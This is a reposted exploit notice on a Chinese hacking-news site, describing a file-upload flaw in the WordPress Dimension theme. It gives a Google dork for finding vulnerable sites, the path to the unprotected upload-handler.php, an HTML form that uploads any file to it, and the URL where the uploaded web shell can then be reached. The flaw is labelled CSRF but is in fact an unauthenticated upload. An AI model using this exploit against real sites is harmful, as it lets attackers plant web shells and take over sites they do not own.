记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Wordpress主题Dimension CSRF缺陷

2013-11-22 12:15

#标题 : Wordpress Dimension Themes CSRF File Upload Vulnerability
 
#作者: DevilScreaM
 
#类型 : Web Applications
 
#开发语言 : PHP
 
#官网 : http://themeforest.net
 
#下载 : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/
 
#已测试: Mozila, Chrome, Opera -> Windows & Linux
 
#Vulnerabillity : CSRF
 
#关键词 :
 
inurl:wp-content/themes/dimension
 
 
CSRF文件上传
 
Exploit & POC :
 
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
 
Script :
 
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
 
 
File Access :
 
http://site-target/uploads/[years]/[month]/your_shell.php
 
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

 

知识来源: www.2cto.com/Article/201311/259177.html

阅读:66196 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“Wordpress主题Dimension CSRF缺陷”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云